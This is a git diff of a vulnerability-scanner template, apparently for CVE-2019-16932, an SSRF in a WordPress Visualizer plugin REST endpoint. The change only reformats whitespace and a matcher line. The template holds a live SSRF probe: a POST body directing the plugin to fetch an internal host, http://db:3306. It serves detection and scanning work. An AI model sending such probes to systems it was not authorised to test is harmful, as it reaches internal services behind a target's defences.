Update CVE-2019-16932.yaml
parent
869d89ec88
commit
a9638704d5
|
@ -18,6 +18,7 @@ requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-json/visualizer/v1/upload-data'
|
- '{{BaseURL}}/wp-json/visualizer/v1/upload-data'
|
||||||
|
|
||||||
body: '{\"url\":\"http://db:3306\"}'
|
body: '{\"url\":\"http://db:3306\"}'
|
||||||
|
|
||||||
headers:
|
headers:
|
||||||
|
@ -28,7 +29,8 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- 'db_1'
|
- 'db_1'
|
||||||
part: body
|
|
||||||
|
|
Loading…
Reference in New Issue